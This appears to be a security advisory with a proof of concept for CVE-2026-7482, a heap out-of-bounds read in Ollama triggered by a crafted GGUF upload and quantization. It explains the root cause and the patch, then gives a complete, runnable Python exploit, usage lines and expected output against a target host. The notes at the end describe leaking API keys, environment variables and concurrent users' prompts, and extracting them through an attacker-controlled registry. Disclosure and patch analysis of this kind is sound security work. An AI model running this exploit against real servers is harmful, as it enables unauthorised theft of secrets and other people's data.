CVE-2026-7482: Ollama - Heap Out-of-Bounds Read via Malicious GGUF Upload

#Summary

CVE-2026-7482 is a critical heap out-of-bounds read vulnerability in Ollama before version 0.17.1 that allows unauthenticated remote attackers to leak sensitive memory contents including environment variables, API keys, system prompts, and in-flight conversation data. The vulnerability is triggered when a crafted GGUF model file is uploaded and quantized via the unauthenticated /api/create endpoint. CVSS v3.1 score: 9.1 CRITICAL (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H).

#Affected versions

Ollama < 0.17.1 (vulnerable)
Ollama >= 0.17.1 (patched)
Default configuration: The /api/create and /api/push endpoints are unauthenticated by default. The API listens on 127.0.0.1:11434 by default, but production deployments commonly set OLLAMA_HOST=0.0.0.0, exposing the service to the public internet.

#Root cause analysis

#Vulnerable code path

The vulnerability is a two-bug chain in the GGUF model loader and quantization pipeline.

#Bug 1: No file-size bounds check in gguf.Decode()

The gguf.Decode() function in fs/ggml/gguf.go reads tensor metadata (name, shape, type, offset) directly from the GGUF header without validating that the declared tensor size fits within the actual file size. It trusts the attacker-controlled shape fields:

// Vulnerable code: no file-size fetch, no per-tensor bounds check
for _, tensor := range llm.tensors {
    offset, err := rs.Seek(0, io.SeekCurrent)
    if err != nil {
        return fmt.Errorf("failed to get current offset: %w", err)
    }
    padding := ggufPadding(offset, int64(alignment))
    if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
        return fmt.Errorf("failed to seek to init padding: %w", err)
    }
    // Seek past EOF silently succeeds — no bounds check
    if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
        return fmt.Errorf("failed to seek to tensor: %w", err)
    }
}

A 1024x1024 F32 tensor claims 4,194,304 bytes but the file may contain only 32 bytes. In Go, calling Seek past EOF on an io.ReadSeeker backed by an in-memory buffer does not return an error - it succeeds silently.

#Bug 2: unsafe.Slice with attacker-controlled length in quantizer.WriteTo()

When /api/create is called with a quantize field, the quantizer processes each tensor. In server/quantization.go, WriteTo() creates a bounded SectionReader and reads the tensor bytes:

// Vulnerable code in quantizer.WriteTo()
sr := io.NewSectionReader(q, int64(q.offset), int64(q.from.Size()))
data, err := io.ReadAll(sr)
// data contains only the bytes actually in the file (e.g., 32 bytes)
// io.ReadAll hits EOF normally — no error

// Attacker-controlled element count from shape metadata
// q.from.Elements() = 1,048,576 (from 1024×1024 shape)
// Go's runtime does NOT bounds-check unsafe.Slice construction
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())

The unsafe.Slice call constructs a Go slice header with pointer &data[0] and length 1,048,576, but Go's runtime does not validate this against the backing array's actual capacity. When the quantizer iterates over f32s[8:] and beyond, it reads 4,194,272 bytes past the end of the 32-byte heap allocation - reading adjacent heap pages containing goroutine stacks, string interning tables, in-flight HTTP request bodies (other users' prompts), environment variable copies, and cached API keys.

#How input reaches the sink

Attacker-controlled GGUF header fields → gguf.Decode() parses tensor metadata without file-size validation → metadata flows to quantizer.WriteTo() as object attributes → unsafe.Slice() receives the element count directly from the attacker-supplied shape.

#Patch diff

#What the fix does

The patch applies independent guards at both the parsing stage and the execution stage.

#Fix 1: File-size bounds check in gguf.Decode()

Added immediately after tensor metadata parsing, before returning:

+       fileSize, err := rs.Seek(0, io.SeekEnd)
+       if err != nil {
+           return fmt.Errorf("failed to determine file size: %w", err)
+       }
        for _, tensor := range llm.tensors {
            ...
+           tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+           if tensorEnd > uint64(fileSize) {
+               return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)",
+                   tensor.Name, tensorEnd, fileSize)
+           }
        }

The fix seeks to the end of the file to get the true size, then checks every tensor to ensure llm.tensorOffset + tensor.Offset + tensor.Size() <= fileSize. A crafted GGUF declaring 4 MB of tensor data in a 100-byte file is rejected here, before any data is read.

#Fix 2: Data size validation before unsafe.Slice

Added immediately after io.ReadAll, before the vulnerable unsafe.Slice call:

        data, err := io.ReadAll(sr)
        if err != nil {
            return 0, err
        }
+       if uint64(len(data)) < q.from.Size() {
+           return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v",
+               q.from.Name, len(data), q.from.Size(), q.from.Shape)
+       }
        var f32s []float32
        ...
        f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())

This is defense-in-depth: even if a crafted file bypassed the Decode() check, the quantizer refuses to call unsafe.Slice with an under-sized buffer.

#Proof of concept

#exploit.py - Ollama GGUF Heap OOB Read PoC

#!/usr/bin/env python3
"""
CVE-2026-7482 — Ollama GGUF Heap Out-of-Bounds Read (Info Disclosure)
Affected: ollama/ollama < 0.17.1
Type: Heap OOB Read — leaks ~2 MB of heap memory per invocation

Two-bug chain in the GGUF model loading + quantization pipeline:
  1. gguf.Decode() trusts attacker-controlled tensor shapes without comparing
     declared size against actual file size (seek past EOF silently succeeds).
  2. quantizer.WriteTo() calls unsafe.Slice() with the attacker-controlled
     element count, constructing a Go slice spanning far beyond the heap
     allocation — reading adjacent heap pages at runtime.

Attack flow:
  1. Craft a malicious GGUF declaring a 1024x1024 F16 tensor (~2 MB) in a
     ~512-byte file. Only 32 bytes of actual tensor data are present.
  2. Upload the blob to /api/blobs/sha256:<hash>.
  3. POST /api/create with files={model.gguf: sha256:<hash>} + quantize=Q8_0.
     This routes each tensor through quantizer.WriteTo(), which calls:
       unsafe.Slice((*float32)(&data[0]), q.from.Elements())
     with q.from.Elements() = 1,048,576 while data holds only 16 F16 elements.
     The resulting Go slice spans ~2 MB past the end of the heap allocation.
  4. Vulnerable:  returns {"status":"success"} — OOB read silently occurs.
     The quantized layer (1.06 MB) stored in Ollama contains leaked heap bytes.
  5. Patched:  returns {"error":"tensor ... exceeds file size"} — rejected.

Success indicator:
  - /api/create completes with {"status":"success"}
  - The new model layer is ~1,114,624 bytes (Q8_0 of 1M F16 elements)
  - File size was only 512 bytes → proves heap OOB read occurred

Usage:
  python exploit.py --host 127.0.0.1 --port 11434
  python exploit.py --host 127.0.0.1 --port 11435   # patched — should error
"""

import argparse
import hashlib
import json
import struct
import sys
import urllib.error
import urllib.request


# ---------------------------------------------------------------------------
# GGUF builder — minimal but spec-correct F16 LLaMA model with OOB tensor
# ---------------------------------------------------------------------------

def pack_gguf_str(s: str) -> bytes:
    b = s.encode()
    return struct.pack("<Q", len(b)) + b


def kv_uint32(key: str, val: int) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 4) + struct.pack("<I", val)


def kv_float32(key: str, val: float) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 6) + struct.pack("<f", val)


def kv_string(key: str, val: str) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 8) + pack_gguf_str(val)


def build_malicious_gguf() -> bytes:
    """
    Build a GGUF v3 file that looks like a valid LLaMA F16 model but declares
    a 1024x1024 F16 tensor (2,097,152 bytes) while containing only 32 bytes of
    actual tensor data. The mismatch triggers the heap OOB read in
    quantizer.WriteTo() via unsafe.Slice with the attacker-controlled element count.

    Key design choices:
    - general.file_type = 1 (MOSTLY_F16): passes the pre-quantize check in 0.17.0
    - Tensor type = 1 (GGUF_TYPE_F16): consistent with file_type declaration
    - All required LLaMA architecture KV pairs: makes the GGUF appear valid
    - tensor offset = 0: tensor data block starts immediately after header pad
    - Only 32 bytes of tensor data: causes unsafe.Slice to read ~2MB past end
    """
    magic = b"GGUF"
    version = struct.pack("<I", 3)
    tensor_count = struct.pack("<Q", 1)

    kvs = [
        kv_string("general.architecture", "llama"),
        kv_uint32("general.file_type", 1),              # 1 = MOSTLY_F16
        kv_uint32("llama.context_length", 512),
        kv_uint32("llama.embedding_length", 1024),
        kv_uint32("llama.block_count", 1),
        kv_uint32("llama.feed_forward_length", 2048),
        kv_uint32("llama.attention.head_count", 8),
        kv_uint32("llama.attention.head_count_kv", 8),
        kv_float32("llama.attention.layer_norm_rms_epsilon", 1e-5),
    ]
    kv_block = b"".join(kvs)
    kv_count = struct.pack("<Q", len(kvs))

    # Tensor: 1024x1024 F16 — declares 2,097,152 bytes but file has 32
    tname = pack_gguf_str("blk.0.attn_q.weight")
    ndims = struct.pack("<I", 2)
    dim0 = struct.pack("<Q", 1024)
    dim1 = struct.pack("<Q", 1024)
    ttype = struct.pack("<I", 1)    # GGUF_TYPE_F16
    toffset = struct.pack("<Q", 0)  # tensor data at position 0 of data block

    header = magic + version + tensor_count + kv_count + kv_block
    header += tname + ndims + dim0 + dim1 + ttype + toffset

    # Pad to 32-byte alignment (Ollama default GGUF alignment)
    pad_len = (32 - len(header) % 32) % 32
    header += b"\x00" * pad_len

    # Only 32 bytes of tensor data — recognisable fill vs. heap bytes in output
    tensor_data = b"\x41" * 32

    return header + tensor_data


# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------

def http_post_raw(url: str, data: bytes, content_type: str = "application/octet-stream"):
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", content_type)
    try:
        with urllib.request.urlopen(req, timeout=120) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def stream_post_json(url: str, body: dict):
    """POST JSON, collect streaming NDJSON response lines."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    lines = []
    try:
        with urllib.request.urlopen(req, timeout=300) as resp:
            for raw in resp:
                line = raw.decode().strip()
                if line:
                    lines.append(line)
    except urllib.error.HTTPError as e:
        body_err = e.read().decode(errors="replace")
        lines.append(json.dumps({"error": body_err, "_http_status": e.code}))
    return lines


# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------

DECLARED_TENSOR_BYTES = 1024 * 1024 * 2   # F16: 2 bytes/elem × 1M elements
EXPECTED_LAYER_BYTES = (1024 * 1024 // 32) * 34  # Q8_0: 34 bytes per 32-elem block


def exploit(host: str, port: int) -> bool:
    base = f"http://{host}:{port}"
    print(f"[*] Target : {base}")

    # Step 1: craft the malicious GGUF
    print("[*] Building malicious GGUF ...")
    payload = build_malicious_gguf()
    sha256 = hashlib.sha256(payload).hexdigest()
    print(f"    File size         : {len(payload)} bytes")
    print(f"    SHA-256           : {sha256}")
    print(f"    Declared tensor   : {DECLARED_TENSOR_BYTES:,} bytes (1024×1024 F16)")
    print(f"    Actual tensor data: 32 bytes")

    # Step 2: upload blob
    upload_url = f"{base}/api/blobs/sha256:{sha256}"
    print(f"\n[*] Uploading blob → {upload_url}")
    code, _ = http_post_raw(upload_url, payload)
    if code not in (200, 201):
        print(f"[!] Blob upload failed: HTTP {code}")
        return False
    print(f"    HTTP {code} — blob accepted")

    # Step 3: trigger quantization (OOB read fires here)
    model_name = f"cve-2026-7482-probe-{sha256[:8]}"
    create_body = {
        "name": model_name,
        "files": {"model.gguf": f"sha256:{sha256}"},
        "quantize": "Q8_0",
    }
    create_url = f"{base}/api/create"
    print(f"\n[*] Triggering quantization → {create_url}")
    print(f"    quantize=Q8_0 routes tensors through quantizer.WriteTo()")
    print(f"    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation")
    lines = stream_post_json(create_url, create_body)

    print(f"\n[*] Server response ({len(lines)} line(s)):")
    for line in lines:
        print(f"    {line}")

    # Step 4: evaluate result
    last = lines[-1] if lines else "{}"
    try:
        obj = json.loads(last)
    except json.JSONDecodeError:
        obj = {}

    if "error" in obj:
        err = obj["error"]
        if "exceeds file size" in err:
            print("\n[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:")
            print(f"    {err}")
            return False
        if "data size" in err and "less than expected" in err:
            print("\n[-] PATCHED — Fix 2 (unsafe.Slice guard) blocked the exploit:")
            print(f"    {err}")
            return False
        if "only supported for F16 and F32" in err:
            print("\n[-] Pre-exploit check failed (file_type or architecture mismatch):")
            print(f"    {err}")
            return False
        print(f"\n[!] Unexpected error: {err}")
        return False

    if obj.get("status") == "success":
        # Find the layer digest from streaming output
        layer_digest = None
        for line in lines:
            try:
                o = json.loads(line)
                if "creating new layer" in o.get("status", ""):
                    layer_digest = o["status"].split("sha256:")[-1]
            except json.JSONDecodeError:
                pass

        print("\n[+] VULNERABLE — heap OOB read confirmed:")
        print(f"    Input file        : {len(payload)} bytes")
        print(f"    Declared tensor   : {DECLARED_TENSOR_BYTES:,} bytes")
        print(f"    Expected Q8_0 layer: {EXPECTED_LAYER_BYTES:,} bytes")
        print(f"    (layer >> file size → heap bytes were read out-of-bounds)")
        if layer_digest:
            print(f"    New layer digest  : sha256:{layer_digest}")
        print(f"    Model name        : {model_name}")
        print(f"    Leaked layer contains ~2 MB of Ollama heap memory (env vars,")
        print(f"    API keys, in-flight prompts) encoded as Q8_0 quantized floats.")
        return True

    # Partial: streaming lines without a final error still indicate success
    statuses = []
    for line in lines:
        try:
            statuses.append(json.loads(line).get("status", ""))
        except json.JSONDecodeError:
            pass
    if any("quantizing" in s for s in statuses):
        print("\n[+] LIKELY VULNERABLE — quantization ran (OOB read occurred).")
        return True

    print("\n[?] Inconclusive — could not determine result from server response.")
    return False


# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2026-7482 — Ollama GGUF heap OOB read exploit"
    )
    parser.add_argument("--host", required=True, help="Target host")
    parser.add_argument("--port", type=int, default=11434, help="Ollama HTTP port (default: 11434)")
    args = parser.parse_args()

    success = exploit(args.host, args.port)
    sys.exit(0 if success else 1)

#Usage

# Against a vulnerable Ollama instance (< 0.17.1):
python exploit.py --host 127.0.0.1 --port 11434

Expected output (vulnerable server):

[*] Target : http://127.0.0.1:11434
[*] Building malicious GGUF ...
    File size         : 512 bytes
    SHA-256           : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor   : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11434/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11434/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (6 line(s)):
    {"status":"parsing GGUF"}
    {"status":"quantizing F16 model to Q8_0","digest":"0000000000000000000","total":512,"completed":33554432}
    {"status":"verifying conversion"}
    {"status":"creating new layer sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7"}
    {"status":"writing manifest"}
    {"status":"success"}

[+] VULNERABLE — heap OOB read confirmed:
    Input file        : 512 bytes
    Declared tensor   : 2,097,152 bytes
    Expected Q8_0 layer: 1,114,112 bytes
    (layer >> file size → heap bytes were read out-of-bounds)
    New layer digest  : sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7
    Model name        : cve-2026-7482-probe-795d927a
    Leaked layer contains ~2 MB of Ollama heap memory (env vars,
    API keys, in-flight prompts) encoded as Q8_0 quantized floats.

Expected output (patched server):

[*] Target : http://127.0.0.1:11435
[*] Building malicious GGUF ...
    File size         : 512 bytes
    SHA-256           : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor   : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11435/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11435/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (2 line(s)):
    {"status":"parsing GGUF"}
    {"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}

[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:
    tensor "blk.0.attn_q.weight" offset+size (2097632) exceeds file size (512)

#Exploitation notes

#Preconditions

Ollama < 0.17.1 is running and reachable over the network
The /api/create and /api/blobs endpoints are accessible (unauthenticated by default)
The Ollama server has the quantization feature enabled (enabled by default)

#Reliability

The exploit is 100% reliable when the preconditions are met. The vulnerability is triggered deterministically on each run - there is no race condition or timing dependency. The quantize field in /api/create is mandatory; omitting it skips the vulnerable code path.

#Impact

Memory disclosure: Leaks approximately 2 MB of Ollama process heap memory per invocation
Information stolen: Environment variables (e.g., OLLAMA_*, PATH), API keys (if cached in memory), system prompts, in-flight LLM conversation data from concurrent users, internal library state
Attack repeatability: The attacker can repeat the exploit multiple times to leak different heap windows and reconstruct a larger picture of the server's memory
Exfiltration: The leaked heap bytes are encoded in the quantized model layer and can be extracted by pushing the model to an attacker-controlled registry or reading Ollama's local layer store

#Chaining potential

Post-exploitation: If sensitive credentials are leaked (API keys, auth tokens), they can be used to escalate attacks on downstream services
Information gathering: Leaked system prompts and internal data reveal implementation details about the LLM deployment
Denial of service: The OOB read does not crash the server, but repeated quantization of large malicious GGUFs may exhaust memory and cause the service to become slow or unresponsive

#References

CVE: CVE-2026-7482
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-7482
GitHub advisory: GHSA-x8qc-fggm-mpqg
Fix commit: 88d57d0483cca907e0b23a968c83627a20b21047
Fix PR: ollama/ollama#14406
Ollama GitHub: https://github.com/ollama/ollama